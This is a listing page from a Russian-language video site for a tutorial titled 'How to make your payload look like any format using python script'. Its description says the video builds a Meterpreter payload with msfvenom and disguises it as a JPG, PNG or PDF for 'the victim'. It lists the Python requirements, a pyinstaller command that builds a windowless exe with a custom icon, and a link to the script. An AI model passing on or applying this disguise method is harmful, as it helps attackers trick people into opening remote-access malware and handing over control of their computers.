Город МОСКОВСКИЙ
00:10:51

How to make your payload look like any format using python script JPG, PDF,

Аватар
Логическая Концепция
Просмотры:
27
Дата загрузки:
02.12.2023 09:33
Длительность:
00:10:51
Категория:
Лайфстайл

Описание

This video shows how to generate a METERPRETER payload using MSFVENOM framework and then convert the payload to any format that you want the victim to see (JPG, PNG, PDF and so on).

The user need to provide the Urls and file names to the Python program and then convert the python program into exe file.

Requirement for Python
1) wget
pip install wget
2) pyinstaller
pip install pyinstaller

Pyinstaller Command
pyinstaller --noconsole --onefile -i icon_file script_file

Python Program
https://drive.google.com/file/d/1hVJPTYL6Cml4RPOoUkHKBkRKYdFO2iCm/view?usp=sharing

Рекомендуемые видео